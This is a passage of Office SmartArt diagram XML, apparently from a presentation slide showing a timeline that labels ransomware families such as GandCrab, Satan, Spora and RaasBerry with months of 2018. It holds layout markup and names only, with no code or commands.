      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{51784AAF-F3B4-4BF5-B110-79DC7B7D90D1}" type="parTrans" cxnId="{72E08D25-8933-42AB-99A9-4CE7E13CFCAB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B120B92B-36EA-40E6-B38C-808E6C0CB434}" type="sibTrans" cxnId="{72E08D25-8933-42AB-99A9-4CE7E13CFCAB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4BFD3AAF-30CE-4248-B95C-A28B42C448CB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Karmen Variant</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0699690B-D77F-4307-81B9-11C6536AA180}" type="parTrans" cxnId="{CBE26BE3-6DE0-4C23-ACFE-6E9EDC47508C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B172FD67-816C-4827-ADAE-C62741B92EF1}" type="sibTrans" cxnId="{CBE26BE3-6DE0-4C23-ACFE-6E9EDC47508C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{26C3B5E8-1E10-40EB-94D0-ECC488145431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600" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>2018</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{580A8190-AA38-4F15-96AA-E799AD11A2B2}" type="parTrans" cxnId="{62CADE60-04F3-4388-BFF7-E15904AE7D02}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1CF90CF2-C044-4C3B-9B77-F4E121E42C84}" type="sibTrans" cxnId="{62CADE60-04F3-4388-BFF7-E15904AE7D02}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{06E0AD7F-253E-41B7-9DB6-B501E66D0DF5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January</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD45FD92-1140-45D1-AE70-119FDCFC0076}" type="parTrans" cxnId="{C6845501-6822-4A86-85AA-B391A8B3DF97}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{59872DB6-1476-41AE-BFFD-5C09AF344E3A}" type="sibTrans" cxnId="{C6845501-6822-4A86-85AA-B391A8B3DF97}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E18FEC7A-D632-4985-BE41-47A231EDBCAB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b="0" dirty="0" err="1"/>
            <a:t>GandCrab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37B460B8-47B3-459E-A072-D87BFDEB0BE8}" type="parTrans" cxnId="{111E4595-DC13-4AD0-9D6B-307D6DE6BF34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83E871AF-511B-4CDE-AFB5-8A29054B333A}" type="sibTrans" cxnId="{111E4595-DC13-4AD0-9D6B-307D6DE6BF34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{40864BE2-C572-4FD6-BE0B-F69DB2AAC87F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b="0" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Data Keeper</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6162F07D-FAB7-4C91-8E23-0AA9241A3906}" type="parTrans" cxnId="{EE978B03-180B-40C0-BCC5-C8A9BC36DFEC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F72A638A-D138-442E-8847-DC4B31909273}" type="sibTrans" cxnId="{EE978B03-180B-40C0-BCC5-C8A9BC36DFEC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C0E4A129-2E93-4D3F-AFBB-061DCF110859}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm rot="17700000">
          <a:off x="6763335" y="1339948"/>
          <a:ext cx="1022729" cy="492876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January</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C12721F0-4C48-4A2B-9DF3-E2313003C295}" type="parTrans" cxnId="{6FB7A13D-D586-4A85-99F8-98EEEA73137F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{141DBEA8-D1ED-4D91-9058-B5C081A23F08}" type="sibTrans" cxnId="{6FB7A13D-D586-4A85-99F8-98EEEA73137F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C4539F7-FF3E-4D80-8661-1938ABA0B763}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm rot="17700000">
          <a:off x="6763335" y="1339948"/>
          <a:ext cx="1022729" cy="492876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Satan</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{711FC5AB-0D2C-4795-8916-D3848DCBDDF8}" type="parTrans" cxnId="{571E2D6D-7154-4F26-A11B-2B2EC8AAC2BB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB3B91F6-B298-4AD9-91D4-912991696561}" type="sibTrans" cxnId="{571E2D6D-7154-4F26-A11B-2B2EC8AAC2BB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3117CC6-CF81-47CB-9A26-84C03D4B256D}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm rot="17700000">
          <a:off x="6763335" y="1339948"/>
          <a:ext cx="1022729" cy="492876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Hotsman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EB7B1DA5-5423-4C0C-BA4B-5CE03FA62B18}" type="parTrans" cxnId="{36BCB72C-FE96-4F2F-9100-663560300973}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D1541F2-9DF3-4E06-B705-A89066DCB5C5}" type="sibTrans" cxnId="{36BCB72C-FE96-4F2F-9100-663560300973}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A6A3FEFE-154E-4A6D-A929-9DCEEF9538F4}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm rot="17700000">
          <a:off x="6763335" y="1339948"/>
          <a:ext cx="1022729" cy="492876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Flux</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3792B548-637E-4DC4-A890-23111638F916}" type="parTrans" cxnId="{0BA49DF1-D879-4ED4-ABDA-4F9231D28C79}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{97E21102-E828-4B99-AFE4-C2CCF96CB1F6}" type="sibTrans" cxnId="{0BA49DF1-D879-4ED4-ABDA-4F9231D28C79}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7FF0D85A-1FA7-407B-B931-B52E2B13F153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FileFrozr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2B1432DF-681A-4DDB-8B41-F751E0733E35}" type="parTrans" cxnId="{F449D16C-DF0E-413E-9F16-BC99672DFEDF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7066B9E6-2E59-4B74-98F6-551B980735C3}" type="sibTrans" cxnId="{F449D16C-DF0E-413E-9F16-BC99672DFEDF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDB2864A-2A19-40C8-9D98-2003A6556106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July</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{92BCCD9F-EE9D-4358-98D6-FAC2A6FB3091}" type="parTrans" cxnId="{3CB50219-4B7D-46A0-A68F-08DCD8D83A69}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C1E1A62-6A9D-43E5-959D-F8B370373820}" type="sibTrans" cxnId="{3CB50219-4B7D-46A0-A68F-08DCD8D83A69}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A6EBAA02-A3B7-4AB9-BAC7-C7443A0A0B7D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RaasBerry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F707F32A-E902-45CB-8A11-3413D39FE6B7}" type="parTrans" cxnId="{13EB2CA6-24EF-4A4C-8F3B-9BEE0C1BB3E7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7FAF40A2-0C5E-462F-96B0-B6019AFA16E7}" type="sibTrans" cxnId="{13EB2CA6-24EF-4A4C-8F3B-9BEE0C1BB3E7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5667E40C-6675-4140-A0B3-561419134447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September</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BE353FED-86F4-4121-B611-DFD157F19CAE}" type="parTrans" cxnId="{8B05C6B2-157E-48A7-9993-BDD11108BCBC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A52C5EA-6422-466E-B4F5-40508CE87428}" type="sibTrans" cxnId="{8B05C6B2-157E-48A7-9993-BDD11108BCBC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A03E3143-DC55-40C8-BC7F-D6DE8DF64104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>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Paradise</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{661FF722-9A3B-49F7-BBFE-2ED642E08552}" type="parTrans" cxnId="{BA02D603-DC0E-4EF1-A7FC-7EC69FAF5FE1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D1124E72-BCDB-497D-BB79-807CEA88624F}" type="sibTrans" cxnId="{BA02D603-DC0E-4EF1-A7FC-7EC69FAF5FE1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41871AC7-CE38-4D23-B458-7DC79C59C1A9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b="0" dirty="0" err="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>RedFox</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="500" b="0" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FEC0AC23-51D2-48B6-889F-D2357988FA84}" type="parTrans" cxnId="{D86C238F-E75F-40D1-B689-223192F8CE61}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BF0FD307-E79E-48CE-B1ED-7C419767627B}" type="sibTrans" cxnId="{D86C238F-E75F-40D1-B689-223192F8CE61}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EC518604-BFEA-42C1-BC95-627357BC1FBF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b="0" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>March</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA21BA4E-BE93-49DF-9451-A2F17B849B88}" type="parTrans" cxnId="{ADAE662A-20DD-4695-A71E-BCAA2C817F24}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7EF46BBF-DD5A-42AF-8AA8-853CB02735A0}" type="sibTrans" cxnId="{ADAE662A-20DD-4695-A71E-BCAA2C817F24}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD609BA3-4451-4066-88D5-96FFF2E1CE7C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b="0" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Earth</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7B88D363-B35C-4F93-9A14-DF733FCCEA49}" type="parTrans" cxnId="{4D9320EB-B676-466D-A251-9977519991FE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF00C66D-004B-4C47-A409-7142AEF85FDF}" type="sibTrans" cxnId="{4D9320EB-B676-466D-A251-9977519991FE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0665C7F1-AB2F-44AF-9499-B89F6F9D62EF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500" dirty="0" err="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Spora</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="500" dirty="0">
            <a:latin typeface="Calibri"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69EE0BCF-CBAC-4CC7-BB49-DE901E1B2C93}" type="parTrans" cxnId="{BA91E35E-5FE2-436D-8627-802A4D7CB123}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{80DD8A8A-40B0-4474-8995-E3FEEE3CE39E}" type="sibTrans" cxnId="{BA91E35E-5FE2-436D-8627-802A4D7CB123}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{26FDD54A-E4E3-4B15-94AB-53E21F48CA66}" type="pres">
      <dgm:prSet presAssocID="{E4EAE2BA-E6E9-47BE-90DA-7CC8F543793A}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BC092206-83D1-4EBA-AFA6-F6930651E85B}" type="pres">
      <dgm:prSet presAssocID="{E4EAE2BA-E6E9-47BE-90DA-7CC8F543793A}" presName="arrow" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D2CF42EF-56B6-493E-9CE3-75F4F2BDB563}" type="pres">
      <dgm:prSet presAssocID="{E4EAE2BA-E6E9-47BE-90DA-7CC8F543793A}" presName="points" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{97481AC8-159C-4660-B031-41C55083DD96}" type="pres">
      <dgm:prSet presAssocID="{28E50F4E-A211-4387-B97C-8204D2D63C7E}" presName="compositeA" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BEFDF58F-43EF-4D20-BDFF-FA2766681C25}" type="pres">
      <dgm:prSet presAssocID="{28E50F4E-A211-4387-B97C-8204D2D63C7E}" presName="textA" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0704A34E-15E8-4B4E-9EDA-157D4A4B1C3C}" type="pres">
      <dgm:prSet presAssocID="{28E50F4E-A211-4387-B97C-8204D2D63C7E}" presName="circleA" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CBD81CD0-EF02-443C-AACA-896D6A8A7A7A}" type="pres">
      <dgm:prSet presAssocID="{28E50F4E-A211-4387-B97C-8204D2D63C7E}" presName="spaceA" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{059BF4AD-5DBD-4505-84E9-D10BBA6C7064}" type="pres">
      <dgm:prSet presAssocID="{7E88C0FE-9E9F-45D8-9EB3-4AB6E6B956AA}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BF8BD30F-EB25-462A-92A7-3DB207E37F0D}" type="pres">
      <dgm:prSet presAssocID="{5A22019F-6F97-4DC3-963A-583D3D54A632}" presName="compositeB" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EEA3F194-836B-46FA-966F-FB3DBB9209FA}" type="pres">
      <dgm:prSet presAssocID="{5A22019F-6F97-4DC3-963A-583D3D54A632}" presName="textB" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{702F9093-90FB-4670-97EA-608CEA8A50CD}" type="pres">
      <dgm:prSet presAssocID="{5A22019F-6F97-4DC3-963A-583D3D54A632}" presName="circleB" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{49FBDDEC-288A-4A7B-8A44-C940EAF393AB}" type="pres">
      <dgm:prSet presAssocID="{5A22019F-6F97-4DC3-963A-583D3D54A632}" presName="spaceB" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6EB757D1-F8D4-4131-A1E5-952729943EB9}" type="pres">
      <dgm:prSet presAssocID="{40C46F67-A448-4DFF-9ACB-C354C5196E83}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CA315584-19B4-439C-B551-4307E39B98D0}" type="pres">
      <dgm:prSet presAssocID="{B2B36E35-C0B0-4334-8739-9BF9E9FB5D05}" presName="compositeA" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1AFA2ECC-7081-414F-8FE9-D911E7CB5EBB}" type="pres">
      <dgm:prSet presAssocID="{B2B36E35-C0B0-4334-8739-9BF9E9FB5D05}" presName="textA" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CE0D2536-38E4-4692-9538-0A0CA3109358}" type="pres">
      <dgm:prSet presAssocID="{B2B36E35-C0B0-4334-8739-9BF9E9FB5D05}" presName="circleA" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{17FCDD22-8C77-4EF3-A79B-285075762E4A}" type="pres">
      <dgm:prSet presAssocID="{B2B36E35-C0B0-4334-8739-9BF9E9FB5D05}" presName="spaceA" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B4993846-CB15-4AA2-9549-4F517BE3F233}" type="pres">
      <dgm:prSet presAssocID="{20D42858-A62B-4E8D-9EF6-6A40BC06725C}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{77A2AFD8-54FF-4D29-B35B-3D95D9C8EF79}" type="pres">
      <dgm:prSet presAssocID="{1EAF32EF-2685-41DE-B527-A19EA257EFF2}" presName="compositeB" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6464A6C5-1D76-43AA-BF38-BEF1414786CE}" type="pres">
      <dgm:prSet presAssocID="{1EAF32EF-2685-41DE-B527-A19EA257EFF2}" presName="textB" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BDB0D409-C522-46E4-879E-3CCDF416C45C}" type="pres">
      <dgm:prSet presAssocID="{1EAF32EF-2685-41DE-B527-A19EA257EFF2}" presName="circleB" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{66F8D413-CA9A-4804-9C37-FAB1BEC88291}" type="pres">
      <dgm:prSet presAssocID="{1EAF32EF-2685-41DE-B527-A19EA257EFF2}" presName="spaceB" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8675D657-FD81-40F2-A5AC-7DB7535AABD7}" type="pres">
      <dgm:prSet presAssocID="{C8B63689-AE32-480F-B66B-8481F7137AF6}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{89199573-6B13-46C9-B18D-5858B71B55B4}" type="pres">
      <dgm:prSet presAssocID="{C4843CC7-1E96-4B59-9DC6-ACB4F823B6CA}" presName="compositeA" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{321AD513-822E-41DD-847C-9FBCF49C9F44}" type="pres">
      <dgm:prSet presAssocID="{C4843CC7-1E96-4B59-9DC6-ACB4F823B6CA}" presName="textA" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F25F5B72-A6D4-4903-B95E-4E96B87BFAAE}" type="pres">
      <dgm:prSet presAssocID="{C4843CC7-1E96-4B59-9DC6-ACB4F823B6CA}" presName="circleA" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{01B1F4B6-F585-41FD-A0CC-793AFEFE6410}" type="pres">
      <dgm:prSet presAssocID="{C4843CC7-1E96-4B59-9DC6-ACB4F823B6CA}" presName="spaceA" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6E34B34B-E52E-48ED-ABB6-DCE8C8AA0C03}" type="pres">
      <dgm:prSet presAssocID="{E03609D5-4748-4E3C-8F59-7CA6A6BDD666}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9A94170D-58A2-4D9C-9A72-58E722222F34}" type="pres">
      <dgm:prSet presAssocID="{26C3B5E8-1E10-40EB-94D0-ECC488145431}" presName="compositeB" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F33886AF-511F-4677-874B-6FD9310FF6A3}" type="pres">
      <dgm:prSet presAssocID="{26C3B5E8-1E10-40EB-94D0-ECC488145431}" presName="textB" presStyleLbl="revTx" presStyleIdx="5" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{84BEFD2A-6ECE-4A2A-81F0-EEE91C5025BC}" type="pres">
